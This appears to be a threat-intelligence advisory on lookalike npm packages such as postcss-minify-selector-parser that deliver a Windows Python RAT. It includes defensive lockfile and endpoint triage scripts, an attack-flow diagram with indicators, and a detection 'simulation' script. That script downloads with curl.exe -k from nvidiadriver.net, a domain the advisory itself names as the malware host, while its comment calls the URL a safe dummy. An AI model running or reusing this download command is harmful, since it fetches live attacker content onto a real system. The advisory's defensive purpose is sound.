SOC Prime Bias: High

25 Jun 2026 15:41 UTC

PostCSS Masquerading as a Path to Windows RAT Delivery

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Attackers are abusing npm package impersonation to spread a multi-stage Windows RAT. Malicious packages such as postcss-minify-selector-parser are presented as legitimate build utilities to compromise developer environments. Once triggered, the infection chain launches a PowerShell downloader that fetches a Nuitka-compiled Python RAT capable of stealing credentials and providing remote shell access.

Investigation

Researchers uncovered a cluster of malicious npm packages that reference legitimate dependencies to appear credible. The investigation mapped a layered infection chain that begins with a JavaScript dropper, advances to a PowerShell downloader, and ends with a sophisticated Python-based payload. By analyzing the Nuitka-compiled components, the researchers were able to reconstruct the RAT’s command-and-control protocol and supported commands.

Mitigation

Users should remove the identified malicious npm packages immediately and review dependency trees for any transitive exposure. Organizations should also block the known command-and-control domains and IP addresses. If compromise is suspected, developers should rotate browser-stored credentials and all development-related tokens without delay.
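To support the dependency-tree review above, here is an added PowerShell scan (not part of the SOC Prime advisory) that searches a source tree for the malicious package name in package.json, package-lock.json and npm-shrinkwrap.json, including nested node_modules entries, and lists any installed copies; `$Root` and the single package name in `$badPackages` are assumptions, the latter taken from this page.

```powershell
# Added example, not part of the SOC Prime advisory: finds references to the
# advisory's malicious npm package in manifests and lockfiles under a source
# tree, including transitive (nested node_modules) entries.
param([string]$Root = '.')

# Names taken from the advisory; extend with the rest of the cluster from the full IoC list.
$badPackages = @('postcss-minify-selector-parser')

# Match the name as a JSON key. Covers package.json dependency entries, lockfile v1
# "dependencies" keys, and lockfile v2/v3 "packages" keys, whose install path ends
# in the package name (e.g. "node_modules/a/node_modules/<name>").
$escaped = ($badPackages | ForEach-Object { [regex]::Escape($_) }) -join '|'
$pattern = '"(?:[^"]*/)?(' + $escaped + ')"\s*:'

$manifests = Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue `
    -Include package.json, package-lock.json, npm-shrinkwrap.json

$hits = @()
foreach ($m in $manifests | Select-String -Pattern $pattern) {
    $hits += [pscustomobject]@{
        File    = $m.Path
        Line    = $m.LineNumber
        Package = $m.Matches[0].Groups[1].Value
        Context = $m.Line.Trim()
    }
}

# Installed copies on disk, wherever they sit in the node_modules tree.
$installed = Get-ChildItem -Path $Root -Recurse -Directory -ErrorAction SilentlyContinue |
    Where-Object { $_.Parent.Name -eq 'node_modules' -and $badPackages -contains $_.Name }

if (-not $hits -and -not $installed) {
    Write-Host "No advisory packages referenced or installed under $Root"
} else {
    $hits | Format-Table -AutoSize -Wrap
    $installed | ForEach-Object { Write-Host "Installed copy: $($_.FullName)" }
}
```

Regex matching is used instead of ConvertFrom-Json so the scan works offline on every lockfile version and on Windows PowerShell 5.1, which rejects the empty root key found in v2/v3 lockfiles.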

Response

Windows endpoints should be examined for artifacts such as %TEMP%\winPatch, %TEMP%\.store, and %TEMP%\.host. Investigators should also review persistence in the HKCU\Run registry key for the csshost value. A full audit of developer workstations should be conducted to identify unauthorized remote shell activity or signs of credential theft.
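The following triage script is an added example, not from the advisory, that checks one Windows endpoint for the artifacts listed above; it assumes the names are exactly as given on this page (plus winPatch.zip from the simulation section below) and that "HKCU\Run" means the standard HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.

```powershell
# Added triage script (not part of the SOC Prime advisory): reports the host
# artifacts and persistence value named in the Response section. Artifact and
# value names are assumed to match the advisory exactly.
$findings = @()

# 1. File-system artifacts under the user's temp directory
foreach ($name in @('winPatch', 'winPatch.zip', '.store', '.host')) {
    $path = Join-Path $env:TEMP $name
    if (Test-Path -LiteralPath $path) {
        $item = Get-Item -LiteralPath $path -Force
        $findings += [pscustomobject]@{
            Type     = 'TempArtifact'
            Location = $path
            Detail   = "Created $($item.CreationTimeUtc.ToString('u'))"
        }
    }
}

# 2. Persistence: the csshost value in the current user's Run key
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($run -and ($run.PSObject.Properties.Name -contains 'csshost')) {
    $findings += [pscustomobject]@{
        Type     = 'RunKeyPersistence'
        Location = "$runKey\csshost"
        Detail   = $run.csshost
    }
}

# 3. Live processes whose command line points at the artifact paths
$tempPattern = [regex]::Escape($env:TEMP)
$procs = Get-CimInstance Win32_Process | Where-Object {
    $_.CommandLine -and $_.CommandLine -match $tempPattern -and
    $_.CommandLine -match 'winPatch|\.store|\.host'
}
foreach ($p in $procs) {
    $findings += [pscustomobject]@{
        Type     = 'RunningProcess'
        Location = "PID $($p.ProcessId) ($($p.Name))"
        Detail   = $p.CommandLine
    }
}

if ($findings.Count -eq 0) {
    Write-Host 'No advisory artifacts found on this host.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

Run it in the context of the developer account under investigation, since both %TEMP% and HKCU are per-user.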

```mermaid
graph TB
    %% Class Definitions
    classDef technique fill:#99ccff
    classDef malware fill:#ff9999
    classDef tool fill:#cccccc
    classDef persistence fill:#99ff99

    %% Node Definitions
    attack_supply_chain["<b>Technique</b> – <b>T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools</b><br/><b>Description</b>: Package impersonation on npm via lookalike packages such as postcss-minify-selector-parser.<br/><b>Target</b>: Developer environments"]
    class attack_supply_chain technique

    attack_user_execution["<b>Technique</b> – <b>T1204.005 User Execution: Malicious Library</b><br/><b>Description</b>: Triggered when the malicious npm package is imported.<br/><b>Action</b>: Executes an encoded JavaScript dropper."]
    class attack_user_execution technique

    process_powershell["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/><b>Description</b>: PowerShell is used to write and execute the malicious script.<br/><b>File</b>: ../../settings.ps1"]
    class process_powershell technique

    attack_indicator_removal["<b>Technique</b> – <b>T1070.010 Indicator Removal: Relocate Malware</b><br/><b>Description</b>: Using a deceptive domain to download the payload.<br/><b>Domain</b>: nvidiadriver[.]net"]
    class attack_indicator_removal technique

    tool_cmd_shell["<b>Technique</b> – <b>T1059.003 Command and Scripting Interpreter: Windows Command Shell</b><br/><b>Description</b>: Used for extracting the payload bundle.<br/><b>Trigger</b>: Post-download execution."]
    class tool_cmd_shell technique

    malware_vbs_bootstrapper["<b>Malware</b> – <b>VBS Bootstrapper</b><br/><b>Description</b>: Launches the primary malware payload."]
    class malware_vbs_bootstrapper malware

    malware_rat["<b>Malware</b> – <b>Remote Access Tool (RAT)</b><br/><b>Description</b>: Python-based loader utilizing Nuitka-compiled modules.<br/><b>Functionality</b>: Provides remote access capabilities."]
    class malware_rat malware

    attack_persistence["<b>Technique</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</b><br/><b>Description</b>: Creates a registry value for persistence.<br/><b>Registry Value</b>: csshost"]
    class attack_persistence persistence

    attack_evasion["<b>Technique</b> – <b>T1497.001 Virtualization/Sandbox Evasion: System Checks</b><br/><b>Description</b>: Uses WMI queries to detect virtual environments.<br/><b>Command</b>: wmic bios get serialnumber"]
    class attack_evasion technique

    attack_c2["<b>Technique</b> – <b>T1219 Remote Access Tools</b><br/><b>Description</b>: Maintains communication with C2 server via encrypted POST packets.<br/><b>C2 Address</b>: hxxp[:]//95[.]216[.]92[.]207:8080"]
    class attack_c2 technique

    attack_credential_access["<b>Technique</b> – <b>T1555.003 Credentials from Password Stores: Credentials from Web Browsers</b><br/><b>Description</b>: Steals saved credentials from Chrome.<br/><b>Target Files</b>: Login Data and Local State"]
    class attack_credential_access technique

    %% Connections
    attack_supply_chain -->|leads_to| attack_user_execution
    attack_user_execution -->|executes| process_powershell
    process_powershell -->|performs| attack_indicator_removal
    attack_indicator_removal -->|triggers| tool_cmd_shell
    tool_cmd_shell -->|launches| malware_vbs_bootstrapper
    malware_vbs_bootstrapper -->|installs| malware_rat
    malware_rat -->|establishes| attack_persistence
    malware_rat -->|performs| attack_evasion
    malware_rat -->|communicates_via| attack_c2
    malware_rat -->|exfiltrates| attack_credential_access
```

Attack Flow

## Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary intends to establish a foothold on the system by masquerading as a legitimate software update process. To do this, they use PowerShell to invoke the native curl.exe utility. By using the -k (insecure) flag, they bypass SSL certificate validation, and by specifying a destination path in $env:TEMP with a filename like winPatch.zip, they attempt to blend into the noise of routine system updates. The goal is to download a malicious payload that, once executed, provides remote access.

  • Regression Test Script:

    ```powershell
    # Simulation script to trigger the specific detection rule
    # Note: This uses a dummy URL for safety, but mimics the exact structure required by the rule.

    # Single quotes keep $env:TEMP unexpanded here; Invoke-Expression expands it at run time.
    # The backslash is required: without it PowerShell reads $env:TEMPwinPatch as one variable name.
    $cmd = 'curl.exe -k -o "$env:TEMP\winPatch.zip" https://nvidiadriver.net/verv1432/winpatch-xd7d.win'

    Write-Host "Executing simulated malicious download command..."
    Invoke-Expression $cmd
    ```
  • Cleanup Commands:

    ```powershell
    # Cleanup the downloaded dummy file (same path the simulation script wrote to)
    if (Test-Path "$env:TEMP\winPatch.zip") {
        Remove-Item -Path "$env:TEMP\winPatch.zip" -Force
        Write-Host "Cleanup successful: Dummy file removed."
    } else {
        Write-Host "Cleanup: File not found."
    }
    ```